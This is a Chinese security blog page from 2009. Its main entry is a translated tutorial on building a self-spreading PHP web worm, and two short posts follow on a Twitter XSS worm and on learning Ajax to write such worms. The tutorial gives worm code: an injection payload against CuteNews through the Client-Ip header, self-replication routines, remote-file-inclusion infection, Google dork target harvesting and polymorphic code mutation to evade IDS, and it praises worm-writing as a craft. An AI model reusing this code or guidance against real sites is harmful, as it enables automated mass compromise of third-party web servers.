• [翻译]WEB蠕虫编写艺术

    日期:2009-05-01 | 分类:脚本攻防

    标题:web蠕虫编写艺术

    作者:未知

    译者:riusksk(泉哥:http://riusksk.blogbus.com)

    来源:国外著名黑客杂志《hack in zine》

    本文发表于《黑客防线》

     

    *导言    

    *自动化  

    *搜集目标

    *绕过IDS,多态性和通讯      

    *结语    

    ===导言===                              

       本文以一些未公开的WEB蠕虫为例,这些蠕虫可通过PHP漏洞脚本进行自我传播。该蠕虫叫World Cant Wait ,在11.2被公布在成千上万个信息公告栏和博客上,以此反对布什政权。原先它利用的是一个私有漏洞,就是最近曝出的关于CuteNews 1.4的php代码执行漏洞。这个蠕虫可自动寻找目标,并自我繁殖。在蠕虫病毒肆虐的同时,街上的人们还高喊着抗议口号。在此我并不打算冒着触犯法律的风险而去破坏一些系统,而是将通过阐述这项技术,并发布相关的模块代码,以此来推动未来PHP蠕虫的发展。
    虽然本文中故意留有一些错误,并且仅提供部分代码,但凭此你也是可以写出一个具备一定破坏力的蠕虫病毒的,我们这样做的目的主要是为了防止媒体把我们描述成一些具有暴力和破坏力的黑客。编写蠕虫的优美与才智是体现在编写代码本身,而非它可以黑掉多少系统。现在让我们一起去探索其中的奥秘吧,同时请记住:代码无罪!

    ===自动化===                        

    挖掘漏洞并编写一个可自动搜集目标和利用的引擎。WEB漏洞具有可预测性,通过搜索引擎可很容易地做到,而且通过构造一系列的HTTP requests即可实现自动化攻击。

    while ($stop == false) {
     $list = gather_targets();
     for ($i=0;$i<count($list);$i++) {
     echo " [x] targetting $list[$i]...\n";
     if (!is_infected($list[$i])) infect($list[$i]);
     }
     $stop = true;
    }

    为了让WEB蠕虫进行自我传播,你需要将利用过程自动化,这可以通过使用PHP socket函数与web server建立连接,并发送http数据。下面的函数演示了如何使用PHP脚本来连接服务器,发送数据并返回响应信息:   

    function make_request($domain, $packet) {
     $fp = @fsockopen($domain, 80, $errno, $errstr, 10);
     if (!$fp) return false;
     fwrite($fp, $packet);
     while (!feof($fp)) $text.= fgets($fp);
     fclose($fp);
    }                                                       

    接下来的工作就仅仅只是构造一个适合的HTTP request,以利用漏洞,并进行自我复制以感染系统。当有人对文章发表评论时,CuteNews便将信息写入data/flood.db.php文件中。通过Client-Ip HTTP header传输数据,你就可以向这个文件注入PHP代码。

    $packet = str_replace("\n","\n\r",
    "POST
    $location/example2.php?subaction=showcomments&id=1128188313&archive=&start_from=
    &ucat=& HTTP/1.1
    Accept: */*\r\nAccept-Language: en
    Accept-Encoding: gzip, deflate
    Client-Ip: <?php echo \"arbitrary php code to be executed!!\"; ?>
    User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6
    (KHTML, like Gecko) Safari/412.2
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 107
    Connection: close
    Host: $domain

    name=haxitup&mail=&comments=j00+haxed+%3Alaughing%3A&submit=Add+My+Comment&
    subaction=addcomment&ucat=&show=

    ";                            

     如果我们创建了这些请求,那么就可以通过Client-Ip将PHP代码写入到flood.db.php文件中,然后我们就可以通过一个正规的GET请求来执行代码了。既然可以将PHP代码执行的过程自动化,那么我们就可以开始着手准备去如何编写病毒代码,以实现其自我繁殖并植入payload的功能。下面的例子将复制整个蠕虫代码到漏洞服务器上的sekret.php文件中,以备运行。你可以在Client-Ip未端添加一些payload,通过运行sekret.php使其在news.txt顶端中添加一新标题,让每个存在漏洞的CuteNews站点都发表一新闻帖。

    $source = str_replace("\$", "\\\$",str_replace("\"", "\\\"",str_replace("\\",
    "\\\\",file_get_contents($_SERVER['PHP_SELF']))));
    ...
    Client-Ip: <?php \$fp=fopen(\"sekret.php\", \"w\");fwrite(\$fp,
    \"$source\");fclose(\$fp); ?>\r\n ...
    ...
    for ($i=0;$i<2;$i++) { $bob = make_request($domain, $packet); }
    make_request($domain, "GET $location/data/flood.db.php HTTP/1.1\r\nHost:
    $domain\r\nConnection: close\r\n\r\n");
    其它感染方式:PHP文件包含

    关于将PHP文件包含漏洞的处理自动化的技术也并不是很难,通常我们粗劣写出来的PHP脚本都普遍含有<?php include $page; ?>这样一段代码,该代码存在远程PHP代码执行漏洞,我们可以将一小段PHP代码作为GET 变量'page'的值,然后通过URL进行传输。这样我们的通过URL来发送HTTP GET request 以使其在其它服务器上自行运行,蠕虫就可以在WEB的根目录下的一些地方进行自我复制了。

    $fp = fopen("sekret.txt", "w");
    fwrite($fp, file_get_contents($_SERVER['PHP_SELF']));
    fclose($fp);
    $url = $_SERVER['SCRIPT_URI'];
    make_request($domain, "GET /test.php?path=$url HTTP/1.1\r\nHost:
    $domain\r\nConnection: close\r\n\r\n");

    其它感染方式:SQL

    其它感染方式:JavaScript / XSS

    ===搜集目标===

     在worm开发期间,最为明智的做法是将实际的利用代码与目标搜集代码相分离开来。你可以在自己的机器上或局域网内,使用类似下列的代码进行测试:

    function gather_targets() {
     return array("http://localhost/cutenews");
    }
    基于web蠕虫的意图,通过搜索引擎去寻找潜在的目标是很有必要的。你可以很容易地写出一些请求,并通过URLs让网站执行特定软件。这可以通过网页收集代码来产生一组包含可被worm感染的目标数组,以此实现其自动化。

     $search = array("inurl:flood.db.php", "\"powered by cutenews v1.3\"",
    "\"/cutenews/remote_headlines.php\"", "\"powered by CuteNews\" \"2003..2005
    CutePHP\"",  "inurl:\"/newsarchive.php?archive\"");
     $query = $search[rand(0, count($search)-1)];
     
    通过构造HTTP requests,你就可以从搜索引擎中获得搜索结果,然后从返回的网址中寻找合适的目标。

    $fp = fsockopen("google.com", "80");
     fwrite($fp, "GET /search?q=" . urlencode($query) .
    "&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls
    =org.mozilla:en-US:official HTTP/1.1\r\n
    Host: www.google.com\r\n
    User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)
    Gecko/20050511/1.0.4\r\n
    Accept:
    text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    image/png,*/*;q=0.5\r\n
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Connection: close\r\n\r\n");
     while (!feof($fp) AND (strpos($text, "2005 Google") === false)) {
     $text.= fgets($fp);
     }
     fclose($fp);
     
     while (!(strpos($text, "<a href=\"http://") === false)) {
     $starttext = substr($text, strpos($text, "<a href=\"http://") + 9);
     $thenumber = substr($starttext, 0, strpos($starttext, "\""));
     $text = str_replace("<a href=\"$thenumber\">", "x", $text);  
     if (strpos($thenumber, "google") === false) $vuln[] = $thenumber;
     } 
     print_r($vuln);

    ===绕过IDS,多态性和通讯===

    你可以通过查找和替换以上代码,以调整上面写得比较匆忙的代码,使其便于用在每个新的迭代蠕虫病毒中。PHP与其它语言相似,有提供一些可互换,并可产生相同结果的函数别名。现在考虑一下,通过添加外部的垃圾代码以混淆文件大小和通过对代码进行编码的相似之处。除了改变程序中的变量名之外,还可以将数字及字符串以不同的方式来表达。

    $random++;              ->        $random+= -2 + 3;
    $start = "go";          ->        $start = chr(103) . chr(111);
    $num = count($result);  ->        $num = sizeof($result);
    下面的代码是改于29a病毒杂志上公布的变量名变形的源代码:

    <?php
    $changevars=array('changevars', 'content', 'newvars', 'counti','countj',
    'trash');
    srand((double)microtime()*1000000);
    $content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
    $counti=0;
    while($changevars[$counti]) {
     $content=str_replace($changevars[++$counti], trash('',0), $content);
    }
    fwrite(fopen(__FILE__,'w'),$content);

    function trash($newvar, $countj) {
     do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
     return $newvar;
    }
    ?>
    将http request中的数据集随机化,以使其具备不可预测性。通过选择一个随机的user-agent,以使其看起来像真实的users。或者你也可以调整实际的POST数据,使其不能在每个表单名中使用相同的名称(比如上面的cutenews一例)。

    如果蠕虫病毒依靠像google这样的搜索引擎来搜集目标,那么就应该考虑将请求多样化了,以减少被加入黑名单而被查杀的可能性。inurl(译注:google的搜索命令)可以用来搜索很多的页面,但intitle也是相当不错的。将http request中的user-agent随机化,或者结合多个搜索引擎来混杂它们,以此延长worm的生命期。过去和将来的迭代蠕虫病毒的通讯开发方式主要置力于attacked boxes,蠕虫病毒分散的通讯方式也可以帮助worm自动变形,通过发现(fuzzing)新的exploits或者反馈新的攻击方式就可以使其自动变形。

    结语                          

         在通过Php脚本漏洞传播的WEB蠕虫病毒的编写世界中,World Cant Wait作为一个简单的proof-of-concept而被制造出来。虽然蠕虫代码不能摧毁系统(上面的代码甚至未经修改就不能运行),但这个PoC可用于改造成各种payload。之前脚本蠕虫的雏形只是用来搜集jumpbox,捕获密码,或者DDoS主流系统,然而实际上也有些人是通过它来修补脆弱软件中的安全漏洞;也有人正蕴酿着如何在各留言板,博客和信息栏上大肆灌水,以此轰炸站点和操作google的网站收录及其它spidering系统。这种情况可能是永无休止的,但真正的天才是体现在创造力上。大部分人对像编写蠕虫病毒这样的高级编程很感兴趣,主要是因为开发出可自动搜集目标并对其攻击的高效代码具有一定的技术挑战。没有任何更为可行和完美的编程训练,可以比编写蠕虫病毒如此地更为有效和复杂。即使制造病毒在国人的眼光中是违法的,但人们对这项技术的兴趣依然长盛不衰,并且已经持续了几十年,并将一直成为黑客文化中的一部分,同时以一种安全可靠的方式来发展它们。

     

  • Twitter XSS Worm

    日期:2009-04-15 | 分类:脚本攻防

    近日出现了一种XSS Worm可感染Twitter用户,当用户查看受感染用户的个人资料时可引起病毒感染,并以此来进行自我复制传播。通过下面几步进行感染:

    1. 登陆 www.twitter.com
    2. 访问受感染用户的相关页面;
    3. 进入 "Settings" 菜单;
    4. 在 "Name"文本域中编辑XSS Worm代码;
    5. 在"More info URL"文本域中也可用来编辑蠕虫代码的。

    据说蠕虫作者是位来自美国纽约的17岁小伙子写的,关于这方面的新闻可查看下面链接:

    1.Twitter Gets Slammed By the StalkDaily XSS Worm:

    http://news.slashdot.org/article.pl?sid=09/04/12/1339258

    2.Second Twitter worm infects user profiles; author says more to come:

    http://adjix.com/af5t

    关于跨站蠕虫源代码可以进入下面的链接查看:

    http://gist.github.com/93782

     

  • 掌握ajax系列教程

    日期:2009-03-31 | 分类:随笔杂谈

    有志于写XSS Worm的朋友,真的应该去学习ajax技术,毕竟现在web2.0时代已经到来了,关于这web2.0安全的,可以看看《细数WEB2.0下的十大安全威胁》。这里我在网上找了份关于ajax的教程,是IBM的,地址如下:http://www.ibm.com/developerworks/cn/web/wa-ajaxintro/